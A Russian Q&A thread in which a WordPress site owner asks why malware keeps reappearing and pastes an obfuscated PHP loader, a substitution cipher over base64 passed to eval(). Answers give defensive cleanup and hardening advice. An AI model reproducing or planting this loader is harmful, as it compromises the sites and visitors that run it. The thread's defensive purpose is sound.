# Вирусы в WordPress

Tags: wordpress, вирусы

Ограничиваю доступ ко всем файлам и папкам 550, а вирусы все равно появляются.
Как это остановить?

Это такие вирусы:

```html
<?php
if (!defined('ALREADY_RUN_1bc29b36f342a82aaf6658785356718'))
{
define('ALREADY_RUN_1bc29b36f342a82aaf6658785356718', 1);

 $iywekrrb = 4266; function wfhrwni($befanoe, $yqbnrusx){$skhpg = ''; for($i=0; $i < strlen($befanoe); $i++){$skhpg .= isset($yqbnrusx[$befanoe[$i]]) ? $yqbnrusx[$befanoe[$i]] : $befanoe[$i];}
$huccvst="base" . "64_decode";return $huccvst($skhpg);}
$riqlqi = 'Pay29EtQeS0THbwVX9D0HMNnH0KpebHMz9tIwZdgXrp29EtQeS0'.
'THbwVX9DpebDTBWNqeiN5Nqvfg9EJPaQUOR4QWi20D9fMeRu8Wbw8BR2j'.
'Dx0ne0KVORj0Nqvfg9EJPaQUBWNqeiNTHSwveiNVOR4MXPUQIvVXa620DuKVORj0WbdQeR0VXPUQIvVXPay29S'.
'0SX9uEBRBQeSwEX9NaLutT7ZKgCsEQPaQJPayfC9UfBxwSOR40X9NaLutT7ZKgCsvfC0dACsEJPaQKPay29'.
'S0SX9uEBRBQeSwEX9NFLwNuaj7lZ00TZVwaawNtwFKLCsEQPaQJPayfC9UfBxwSOR40X9NFLwNuaj7lZ00TZVwaawNtwF'.
'KLCsvfCsksXrp29MV29fVXORofX9uEBRBQeSwEX9DtruNuaZ7BWjNwr0kd2P7mIPDmBmoqgbNhIP'.
'NhoRBQ2mhqORusgrBhDx0ngrfMXLE29Mp29sUfC9tEBRBQeSZyNVugZEwt7u0TZ0wI'.
'W5FV2xg82b2S2mC5oSF8gSuhBSEbI6NQoRCd2SuVORkdI9HpCPFQIvVXPayfC9UfNx7hDxFflLtIwZd'.
'gIvVXC9UfC97EoW7hWb30YLUKCF4wrFvJPay29sUfC9UE7VdlaEugZjpMoi2ToWwVO9DDCPVfN5a5BrEbgmD0zrZjgPa32xZjI'.
'LjsgmCVzr2momfbIPUi2rHV2qHJPayfC9UfBbdnoSupC97mHjK'.
'hDW7yIvVXPay29sUfC9tQBsUyCRBjeS2VORKAWbw8OW2VHqfMBS0pBwKvDW7TobKADxwAD6gMXLE29sUfC9tJPa'.
'yfC9UfC9UfCxBjeS2VORKACxBQexwTH6wVWb2neM70eM75X97Az9UEB9vfNxBpoRHflLtxoRd5BLE2'.
'9sUfC9UfC9UfYvVXC9UfC9UfC9UfC9UfNxjnBxZflLUEBSdhBqUKlLU8CPkfNbFMCPyfNiHMIvVXC9UfC9UfC9Uf'.
'C9UfNxoflLtUBSKvBR8yNx8pC973eb70Xrp29sUfC9UfC9UfC9UfCx0SC9fEBsUKlrVf7S'.
'upHbZQPayfC9UfC9UfC9UfC9tJPayfC9UfC9UfC9UfC9UfC9UfHSwVDWN'.
'ACPUJPayfC9UfC9UfC9UfC9tKPayfC9UfC9UfC9UfC9t0e620PayfC9UfC9UfC9UfC9tJPayfC9UfC9UfC9UfC9UfC9UfORof'.
'Xx05WbuqHSu4X97EXLEfNxaflLtQeWtpeb70X97EXrp29sUfC9UfC9UfC9UfC9UfC9UEoM0VBW2TDiNQD670esUKCxBiHS0'.
'VBLfEBsvfNxaQIvVXC9UfC9UfC9UfC9UfC9UfCxBmexK5BLfEBsEJPayfC9UfC9UfC9UfC9UfC9Uf'.
'HSwVDWNAC97sYW70HjKiHS0VDxwAIvVXC9UfC9UfC9UfC9UfTaVXC9UfC9UfC9tKPayfC9UfTaVXPayfC9Uf'.
'ORofX9uSDR4mDx0ne0K0Yx05D6gyNbBQexwTBbwVWb2neM70eM75NqEQPayfC9UfYvVXC'.
'9UfC9UfC9tSDR4mDx0nestSORd0WbD0DuKmeb4VBR4VHqfEBS0pBR4heRZQPayfC9UfC9UfC6p29sUfC9UfC9UfC9UfC97SOx'.
'uABxd0CPVfBSKvBR8yNxBQexwAoRj0z9UsHsCQIvVXC9UfC9UfC9UfC9Uf'.
'NxBmeb4VBR4VHqUKCxBqBRuEX97SOxuABxd0z9tSORd0Hb01BLfEBS0pBR4heRZQXrp29s'.
'UfC9UfC9UfC9UfCxBmexK5BLfEBShheS7pBLEJPay29sUfC9UfC9UfC9UfC6N0D6wqesUEBS2'.
'neM70eM75IvVXC9UfC9UfC9tKPayfC9UfTaVXC9UfCxBjeS2VORKACx25WbD0DuKmDWNqBR4VWbBQexwvoW'.
'7yX9E29sUfC9tJPayfC9UfC9UfC6N0D6wqestVHS03X6tqBRDTHSwvexumBLfs'.
'zjvyzsQHN9ksz9UMNqvfWjKxLZduWjkQXrp29sUfC9tKPay29sUfC9tSDR4mDx0nestm'.
'HjKEBR2qYWtVWityoW20X97EoW7hz9UEObw4XaVXC9UfC6p29sUfC9UfC9UfNxKjDuKEoW7hCPV'.
'fCsCJPay29sUfC9UfC9UfBSKqC9fEOrVvIqUEOrd5D6NpBR8yNx7hDxFQIqE29sUf'.
'C9UfC9UfYvVXC9UfC9UfC9UfC9UfBSKqC9fEOmVvIqUEOmd5D6NpBR8yNx3'.
'0YLEfNsofNxEkHi7qexwAX97EoW7hXrpfNxyGXqvfNxEGXqE29sUfC9UfC9UfC'.
'9UfC6p29sUfC9UfC9UfC9UfC9UfC9UEeiwVWb7hDxFfzmVfobhqXxKqB9fEBxuVowpEOwVQCu8feiNEX97GBW0eNxQ'.
'DXLEJPayfC9UfC9UfC9UfC9tKPayfC9UfC9UfC6V29fVXC9UfC9UfC9tq'.
'BW7jHS8fNxKjDuKEoW7hIvVXC9UfC6V29fVXC9UfCxBjeS2VORKACx25Wb70oiN4H6ayNx'.
'7hDxFpC97GBWEQPayfC9UfYvVXC9UfC9UfC9tMexKsoRvfNx25W'.
'bujDxfJPay29sUfC9UfC9UfHSwVDWNACx25Wb70oiN4H67THxhhHbZy'.
'oi2TBxwmHM0vDuKvOxu5BLfEBxuVoLvfNx30YLEpC97mHjKhDW7yXrp29sU'.
'fC9tKPayfC9UfBMwAoi7Qeb8foi2TBR4mHM0vD9fEBxuVoLvfNx30YLE29sUfC9tJPayfC9UfC9UfCx'.
'DpebNhe9UEoi2ToWwVOPp29fVXC9UfC9UfC9tqBW7jHS8foi2TBxwmHM0vD'.
'uKvOxu5BLhmHjKEBR2qYWtVWityoW20X97EoW7hz9UEoi2ToWwVO9EpC97GBWEQIvVXC9UfC6V29fVXC9Uf'.
'CxBjeS2VORKACx25WbD0DuKve6wMOR4TobKABS0MX9E29sUfC9tJPayfC9UfC9Uf'.
'C975BRdSWb2neM70eMaflLtUBS0pBwKMBW7TobKADxwAD6gyoi2TB'.
'bwVWb2jHMN0eM7TBS0pBWthDxfyXLEJPay29sUfC9UfC9UfNx2neS'.
'BQBjKveigflLt5D6NveigyN620exBTobKADxwAD9vfeRajXx25WbD0DuKmDWNqBR4VWbBQexwvoW7y'.
'X9EQXrp29sUfC9UfC9UfORofX97meb4SORDTHxK5C9FKlLtxaZdr7LE29sUfC9UfC9'.
'UfYvVXC9UfC9UfC9UfC9UfNx2neSBQBqUKC62joM2VHsfEHbwpB0Kmeb4VBR4Vz9UEobKABS0MWitnHqUG'.
'CPgqXrp29sUfC9UfC9UfC9UfC97ve6wMOR45CPVfa6wAHbwqORupOWQ0Xx25Wb70oiN4H6ayoSu5BroVWb'.
'70obKEBLfEobKABS0MXLvfeRajXx25WbD0DuKmDWNqBR4VWbBQex'.
'wvoW7yX9EQXLEJPayfC9UfC9UfC6V29sUfC9UfC9UfBRd5BaVXC9UfC9UfC9tJPa'.
'yfC9UfC9UfC9UfC9UEHxdjBb0AHqUKCFuqHSu4X9EJPayfC9UfC9UfC6V29fVXC9UfC9UfC9tqBW7jHS8fN6tpDRDQeMgJPa'.
'yfC9UfTaVXPayfC9UfBMwAoi7Qeb8foi2THbwVWitpDRDQe0Kmeb4SORHyN6tpDRDQeMgQPayfC9UfYvVXC9UfC9UfC9UEo'.
'bKABS0MWbwAoqUKCxNhHbZb2uK0eS2nBxZyoi2TBR4mHM0vD9hUHbwqORupOWQ0X97ve6wMOR45XLvfeRajXx2'.
'5WbD0DuKmDWNqBR4VWbBQexwvoW7yX9EQXLEJPayfC9UfC9UfC975BRdSWb2neM70eMaflLtUBS0pBwKMBW7Tob'.
'KADxwAD6gyoi2TBbwVWb2jHMN0eM7TBS0pBWthDxfyXLEJPay29sU'.
'fC9UfC9UfNx2neSBQBjKveigflLt5D6NveigyN620exBTobKADxwAD9vfe'.
'RajXx25WbD0DuKmDWNqBR4VWbBQexwvoW7yX9EQXrp29sUfC9UfC9UfORofX97meb4S'.
'ORDTHxK5C9FKlLtxaZdr7LE29sUfC9UfC9UfYvVXC9UfC9UfC9UfC9UfNx2neSBQBjKnexaflLt5DRN5D6CyN620exBTobKAD'.
'xwAD9vfNx2neSBQBjKveigfXqU5gsEJPayfC9UfC9UfC9UfC9UEHbwpB'.
'0Kmeb4VBR4VCPVfHi7qWiN0HxdhobZyNx2neSBQBjKnexapC97meb4SORDTBR4mz9'.
'UEHbwpB0Kmeb4VBR4VXrp29fVXC9UfC9UfC9tKPayfC9UfC9UfCxwpHbZ29sUfC9UfC9UfYvVXC9UfC9UfC9UfC9UfN620exB'.
'TobKADxwAD9UKC975BRdSWb2neM70eMafzsUsWx4HesknCsUACxjE2Lh'.
'mHjKMBW7ToiwqHSwADuKSORd0HxuVO9fQXLUAC97meb4SORDTBR4mIvVXC9UfC9UfC9tKPay29sUfC9UfC9U'.
'faxBQexwTH6wVWb2neM70eM75Xx25WbD0DuKmDWNqBR4VWbBQexwvoW7yX9'.
'EpC975BRdSWb2neM70eMaQIvVXC9UfC6V29fVXC9UfCxBjeS2VO'.
'RKACx25WitpDRDQe0KhBxayNx4heRZpC97soW202m7TBxuVoLE29sUfC9tJPayfC9UfC9UfC97ve6wMOR45CPVfoi2TB'.
'bwVWitpDRDQe0Kmeb4SORHyXrp29fVXC9UfC9UfC9UEHxdjBb0AHjpEeSu3BwVflLtsoW202m7TBxw'.
'meb70X97soW202m7TBxuVoLEJPay29sUfC9UfC9Ufoi2THbwVWitpDRDQe0Kmeb4SORHyN6tpDRDQeMgQIvV'.
'XC9UfC6V29fVXC9UfCxBjeS2VORKACx25WitpDRDQe0KqBRVyNx4heRZQPayfC9UfYvVXC9UfC9UfC9UEH'.
'xdjBb0AHqUKCx25WbD0DuKve6wMOR4TobKABS0MX9EJPay29sUfC9UfC9UfDR45BWayN6tpDRDQeM2eNx4heRwDX'.
'rp29fVXC9UfC9UfC9tmHjK5BW7THxdjBb0AWb2neSBQBqfEHxdjBb0AHqEJPayfC9UfTaVXPayfC9UfBMwAoi7Qeb8foi2THxd'.
'jBb0AWbdnoRayNx4heRZKr0wgr9E29sUfC9tJPayfC9UfC9UfCxBnHSwhobffXx25WbD0DuKve6wMOR4TobKABS0MX9Efo'.
'WgfN6tAoRj0lr8EHx2neM70eMaQPayfC9UfC9UfC6p29sUfC9Uf'.
'C9UfC9UfCx0SC9fEeSu3BLE29sUfC9UfC9UfC9UfC6p29sUfC9UfC9UfC9UfC9Uf'.
'C9tQBsUyHi7qobjvX97AoRj0z9UEHx4heRZQCPVKCPUQPayfC9UfC9UfC9UfC9UfC9UfYvVXC9UfC9UfC9UfC9UfC'.
'9UfC9UfC9t0DSupX97vobKADxwAD9EJPayfC9UfC9UfC9UfC9UfC9Uf'.
'C9UfCxNqBRuGIvVXC9UfC9UfC9UfC9UfC9UfC6V29sUfC9UfC9UfC9UfC6V29sUfC9UfC9UfC9UfCxwpHbZ'.
'29sUfC9UfC9UfC9UfC6p29sUfC9UfC9UfC9UfC9UfC9t0DSupX97vobKADxwAD9EJPayfC9UfC9UfC9UfC9tKPayfC9UfC'.
'9UfC6V29sUfC9tKPay29sUfC9tSeiN0oR2yC9fEWV2lrV3N7LthHqUEObw4l'.
'r8EDSupDRZQPayfC9UfYvVXC9UfC9UfC9UEBxuVoLUKC97boRdjBrp29sUfC9UfC9UfNx7'.
'hDxuTObw4CPVfNx30Yrp29sUfC9tKPay29sUfC9tQBsUyCL7EoW7h'.
'XaVXC9UfC6p29sUfC9UfC9UfBSKqBRumO9UyNuKarj2ZCxu5C97GBWEKls7boRdjBLE29sUfC9UfC9UfYvVXC9UfC9UfC9UfC9Uf'.
'Nx7hDxFflLUEDSupDRZJPayfC9UfC9UfC9UfC9UEBxuVowKGBWEflLUEObw4IvVXC9UfC9UfC9tKPayfC9UfTaV'.
'XPayfC9UfNx7hDxFflLtUDR45BWNQoRdQYSZyoi2TBxwmHM0vD9hsoW202m7TBxwmeb70X97EoW7h'.
'XLvfNx7hDxuTObw4XLEJPay29sUfC9tQBsUyOW25BWayNx7hDxueNbuGNj'.
'VQC9oSC97mHjKhDW7ylrVEBxuVowpMoRpMWLE29sUfC9tJPayfC9UfC9UfCx0SC9fEBxuVowpMoLDDCPVKC9DQN'.
'qE29sUfC9UfC9UfYvVXC9UfC9UfC9UfC9UfNxEflLttHMNhYLf29sUfC9UfC9UfC9UfC9UfC9UMH6oMCPV+CFtvO6'.
'tbBWN5ORKAX9EpPayfC9UfC9UfC9UfC9UfC9UfNi2bNqUKlsUMgs8vzrFMzUV'.
'XC9UfC9UfC9UfC9UfC9UfC9DhOqHflr8fNx7hDxueNbuGNjVpPa'.
'yfC9UfC9UfC9UfC9UQIvVXC9UfC9UfC9UfC9UfBR2yeqtUHbwqORup'.
'OWQ0X97QXrp29sUfC9UfC9UfC9UfCxw8OWaJPayfC9UfC9UfC6V29sUfC9UfC9UfBRd5BR0SC9fEBxuVowpMo'.
'LDDCPVKC9D0NqE29sUfC9UfC9UfYvVXC9UfC9UfC9UfC9UfBWBhe9fEBxuVowpMB9DDXrp29sUfC9UfC9UfTaVXC9UfC9UfC9t0e'.
'620ORofX97EoW7hRqDhNjVflrVfNitpDRDQesHQPayfC9UfC9UfC6p29sUfC9UfC9UfC9UfCx0SX97EoW7hRqD'.
'5oLDDCPVKC9DhBxaMXaVXC9UfC9UfC9UfC9UfYvVXC9UfC9UfC9UfC9UfC9UfCx25WitpDRDQe'.
'0KhBxayNx7hDxueNiUMWLvfNx7hDxueNbaMWLEJPayfC9UfC9U'.
'fC9UfC9tKPayfC9UfC9UfC9UfC9t0e620ORoyNx7hDxueNi2hNjVflrVfNiN0'.
'eLHQPayfC9UfC9UfC9UfC9tJPayfC9UfC9UfC9UfC9UfC9Ufoi2THxdjBb0AWiN0e'.
'LfEBxuVowpMH9DDXrp29sUfC9UfC9UfC9UfC6V29sUfC9UfC9UfTaVXC9UfC9UfC9t'.
'0obhnC97EoW7hRqDhOqDDIvVXC9UfC9UfC9t0Yx0VX9EJPayfC9UfTaVXPayfC9Ufoi2THxdjBb0AWbdnoRay'.
'Xrp29MV=';
$slnskf = Array('1'=>'6', '0'=>'l', '3'=>'t', '2'=>'N', '5'=>'z', '4'=>'5', '7'=>'R', '6'=>'H', '9'=>'C', '8'=>'4', 'A'=>'u', 'C'=>'I', 'B'=>'Z', 'E'=>'k', 'D'=>'d', 'G'=>'r', 'F'=>'E', 'I'=>'O', 'H'=>'c', 'K'=>'9', 'J'=>'7', 'M'=>'n', 'L'=>'S', 'O'=>'a', 'N'=>'J', 'Q'=>'p', 'P'=>'D', 'S'=>'m', 'R'=>'W', 'U'=>'A', 'T'=>'f', 'W'=>'X', 'V'=>'0', 'Y'=>'e', 'X'=>'K', 'Z'=>'U', 'a'=>'Q', 'c'=>'q', 'b'=>'2', 'e'=>'b', 'd'=>'x', 'g'=>'M', 'f'=>'g', 'i'=>'3', 'h'=>'h', 'k'=>'8', 'j'=>'1', 'm'=>'j', 'l'=>'P', 'o'=>'Y', 'n'=>'v', 'q'=>'y', 'p'=>'s', 's'=>'i', 'r'=>'T', 'u'=>'F', 't'=>'B', 'w'=>'V', 'v'=>'w', 'y'=>'o', 'x'=>'G', 'z'=>'L');
eval/*ralhc*/(wfhrwni($riqlqi, $slnskf));
}
```

Comment: Переустаноаить ядро WordPress с нуля, удалить сомнительные плагины и темы, взятые неизвестно откуда, обновить все до последних версий и поставить плагин защиты, лучше всего - WordFence.

Comment: Обновите wordperss по последней версии. на все используемые плагины поищите инфу на https://www.exploit-db.com/ И в любом случае лучше переставить все с нуля. в системе помимо такого явного шифрованного кода могут оставаться мелкие, не приметные закладки, через которые вас взломают заново.

Comment: Также можете проверить сайт с помощью AI-Bolit. Только в нём необходимо внимательно изучать код всех найденных уязвимостей

Comment: Автор, пожалуйста, свяжитесь со мной! Я собираю вирусные записи как раз такие, пишу лечилку типа Айболита, но с другим принципом. Вы мне очень поможете.

Comment: @DaemonHK загугли "бесплатные шаблоны" и на помойках столько такого добра найдёшь. (Я не собираю их если что)

Comment: Аналогичный вопрос https://ru.stackoverflow.com/questions/666697/%D0%9A%D0%B0%D0%BA-%D1%83%D0%B4%D0%B0%D0%BB%D0%B8%D1%82%D1%8C-%D0%B2%D1%80%D0%B5%D0%B4%D0%BE%D0%BD%D0%BE%D1%81%D0%BD%D1%8B%D0%B9-%D0%BA%D0%BE%D0%B4-%D0%B8%D0%B7-%D1%81%D0%B0%D0%B9%D1%82%D0%B0

Answer (score 15):

> вирусы все равно появляются, как это остановить?

**1. Причины появления**:

1. Темы с помоек *("помойки" - сайты с "бесплатными" темами. Которые они, кстати, называют "шаблонами" - первый признак помойки.)*
2. Плагины оттуда же.
3. Устаревшие темы и плагины с платных маркетов.
4. Темы и плагины некогда из оф каталога, но древние и/или уже удалённые оттуда (удаляются как правило как раз по причине найденных уязвимостей)
5. Установка на сайт разных левых скриптов (как правило от малоизвестных рекламных сетей и тп)
6. Вирусы на ПК
7. Дырявый хостер

**2. Что делать чтобы обезопасить сайт**:

1. Использовать темы и плагины только из оф. каталога: https://wordpress.org/themes/:  https://wordpress.org/plugins/
2. Если покупать, то только у надёжных продавцов: https://wordpress.org/themes/commercial/
3. Следить за обновлениями ВП и компонентов.
4. Следить за безопасностью ПК и для администрирования сайтов использовать отдельный браузер/профиль.
5. Использовать нормальный хостинг (избегать услуг хостинга от регистраторов доменов).
6. Не ставить никаких скриптов из непонятных источников (в т.ч. и скопипащеных из интернета из мануалов аля "фича без плагинов").

**3. Что делать, если уже начались проблемы**:

1. Закрыть доступ к сайту всем, кроме себя. *Если на одном хостинг-аккаунте (пользователе) несколько сайтов, то закрыть все сайты.*
2. Заменить ядро ВП (каталоги `wp-admin`, `wp-includes`) и файлы в корне, кроме `wp-config.php`, `.htaccess` и созданных вами (`robots.txt`, и т.п.) через их первоначальное удаление. Свою версию ВП можно скачать отсюда: https://ru.wordpress.org/releases/
3. Проверить  `.htaccess`.
4. Сделать ревизию плагинов и тем. Удалить древние и неизвестного происхождения. Обновить что можно или заменить при необходимости.
5. *Неактуально по причине отошедшего в мир иной Ай-Болита :( После чего просканировать с помощью Ай-Болита все файлы и дамп базы.*
6. Глазами и поиском ("eval" и т.п.) по хостингу посмотреть на файлы/каталоги выше уровня `www` (`public_html`). Иногда и там встречаются следы.

---

*Примечание*. Можно использовать из оф. каталога и некоторые древние простые плагины, такие, как плагины траслитерации. Но, принимая решение относительно других, стоит проанализировать их код.

> ограничиваю доступ ко всем файлам и папкам 550

Не нужно трогать права вообще.

Это никакое не "ограничение" и никак не влияет на безопасность сайта. Этими правами регулируются доступы различных процессов сервера. А поскольку доступ ко всем файлам имеет процесс php, то изменяя права, можно просто поломать нормальную работу сайта.

Comment: А как же дырявые фрилансеры, которые часто при правках могут несознательно так сделать дырявым весь шаблон.

Дырявые соседи по хостингу...

Comment: @РашенБеар обо всём этом сказано в ответе. 1.5, 1.7, 2.5, 2,6

Comment: Отличный ответ, плюсанул. Я бы вот еще добавил пояснение, почему не нужно трогать права. И упомянул WordFence как вариант - все-таки более 2 млн активных установок.

Comment: @KAGGDesign я не сторонник плагинов "безопасности".  Даже где-то противник. Они ещё хуже чем плагины кеширования. Потому как нужно понимать что нужно в них настраивать и как работает на **конкретном** хостинге.Если этого не понимать - от них больше проблем, чем пользы. А если это понимать - то они нафик не сдались. 99% настраивается в хтацессе и незачем перекладывать на php/ВП работу сервера. :) Кроме разного рода проблем "не могу попасть в админку" это ещё и ненужные нагрузки. А что ты имеешь ввиду добавить про права?

Comment: WordFence обеспечивает автоматическое сканирование ядра и плагинов, и обнаруживает угрозы. Кроме того, добавляет некоторые другие функции. А про права - поясни читателям, почему их смена на 550 или еще на что не влияет на возможность заражения.

Comment: @KAGGDesign вот не далее как сегодня https://ru.wordpress.org/support/topic/%d0%b4%d0%be%d1%81%d1%82%d1%83%d0%bf-%d1%81-%d0%b2%d0%b0%d1%88%d0%b5%d0%b3%d0%be-ip-%d0%b0%d0%b4%d1%80%d0%b5%d1%81%d0%b0-%d0%b1%d1%8b%d0%bb-%d0%b7%d0%b0%d0%b1%d0%bb%d0%be%d0%ba%d0%b8%d1%80%d0%be%d0%b2/ и подобного. валом по всем форумам

Comment: @KAGGDesign попробовал для нубов кратенько сформулировать про права :) Норм или перемудрил?

Comment: Насчет "никакое не "ограничение"" не соглашусь. Если владелец файлов отличается от пользователя, под которым работает веб-сервер - это очень серьезное препятствие на пути модификации файлов ядра WP. Но меняя права нужно осознавать последствия - тут вы правы

Comment: @tutankhamun в "чистом виде" ты немного прав. Но немного, тк это первых это зависит от настроек хостера (и при таком создаёт только гемморой), во вторых - если есть дыра, всё можно сделать не смотря на права, и в третьих  тут вебсайт и этот файл наверняка уже был создан/модифицирован php. и наверняка должен иметь  доступ для нормальной работы сайта (мы не знает откуда этот код, но как правило либо в теме, либо отдельный файл, созданный через дыру в теме).

Comment: @SeVlad Я бы даже сказал что это решение хорошо только для случая когда хостинг не виртуальный. К тому же поддержка сайта должна будет работать уже иначе (потому что после этого на работающем сайте ни плагин не поставишь, ни тему из админки не исправишь)

Comment: @tutankhamun да-да. И ещё много каких проблем при такой настройке - начиная от невозможности закачать медиа, обновить ВП/плаги/темы, создать нужный файлы (привет плагам кеширования, галерей и тд) и тп. И даже при этом гемморе такие настройки не дают безопасности. Но это уже отдельная тема..

Comment: @SeVlad про права доступа - мне кажется, как раз то, что надо